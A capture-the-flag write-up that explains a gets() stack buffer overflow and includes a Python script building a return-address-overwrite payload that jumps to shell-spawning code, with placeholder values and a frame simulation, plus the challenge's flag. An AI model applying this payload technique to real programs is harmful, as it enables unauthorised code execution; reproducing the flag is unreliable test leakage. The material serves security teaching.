El Clasico

By Uday Shankar

This is a simple stack buffer overflow. The program reads user input with gets(), which copies characters into the supplied buffer until it sees a newline (or end of input) and never checks the buffer's size, so an input without a newline is written far past the end of the buffer. The buffer lives on the stack, next to the saved return address of the function that declared it, isCool. Overwriting that saved return address lets us redirect execution to any address we choose as soon as isCool returns: in particular, we can skip the if check entirely and land directly on the code that spawns a shell.

To build the input, we load the binary in gdb and measure the distance from the start of the buffer to the saved return address. The absolute stack addresses differ from run to run, but the layout of the frame is fixed at compile time, so this distance is constant. The payload is that many bytes of filler followed by the target address in little-endian byte order. When gets() consumes the input, the filler fills the buffer and the bytes after it replace the saved return address. When isCool returns, execution continues at the shell-spawning code, and from there it is easy to read the flag.

Two practical caveats: the address of the shell-spawning code is only constant if the binary is not position-independent (with PIE you would first need a leak of the code base), and the bytes of that address must not contain 0x0a, since gets() would stop reading at that byte before the overwrite is complete (NUL bytes are fine; gets() does not stop on them).
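The payload construction described above, as an added example that is not part of the original writeup. The offset (76) and the target address (0x4011d6) are constructed placeholders standing in for the values you would read out of gdb and the disassembly; the frame simulation only models what gets() does to a frame of that layout, it does not run the challenge binary.

```python
import struct
import sys

# Constructed placeholders: in the real challenge these come from gdb
# (buffer start to saved return address) and from the disassembly
# (address of the instructions that spawn the shell).
EXAMPLE_OFFSET = 76
EXAMPLE_TARGET = 0x4011D6


def build_payload(offset, target, word_size=8, filler=b"A"):
    """Return the bytes to feed to gets(): `offset` bytes of filler followed
    by `target` packed little-endian as one machine word.

    gets() stops at '\\n' (and at EOF) but not at NUL, so NUL bytes inside the
    address are harmless; a 0x0a byte anywhere would truncate the payload
    before the overwrite completes, so such a payload is refused.
    """
    if word_size == 8:
        packed = struct.pack("<Q", target)
    elif word_size == 4:
        packed = struct.pack("<I", target)
    else:
        raise ValueError("word_size must be 4 or 8")
    payload = filler * offset + packed
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would stop early")
    return payload


def simulate_frame(payload, offset, orig_ret, word_size=8):
    """Model gets() writing `payload` into a stack frame whose saved return
    address sits `offset` bytes after the start of the buffer, and return
    the value that ends up in the saved-return-address slot.
    """
    fmt = "<Q" if word_size == 8 else "<I"
    frame = bytearray(offset + word_size)
    frame[offset:offset + word_size] = struct.pack(fmt, orig_ret)
    data = payload.split(b"\n", 1)[0]  # gets() stops at the first newline...
    frame[:len(data)] = data           # ...but never at the end of the buffer
    return struct.unpack(fmt, bytes(frame[offset:offset + word_size]))[0]


if __name__ == "__main__":
    # Usage: (python3 gen.py; cat) | ./binary
    # The trailing `cat` keeps stdin open so the spawned shell accepts commands.
    sys.stdout.buffer.write(build_payload(EXAMPLE_OFFSET, EXAMPLE_TARGET) + b"\n")
    sys.stdout.buffer.flush()
```

The simulation makes the two failure modes concrete: a payload whose first newline comes before the return-address slot leaves the original return address intact, and an address containing 0x0a cannot be delivered through gets() at all, which is why build_payload rejects it rather than silently emitting a payload that will never work.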

Flag: one_of_these_pops_up_everytiem
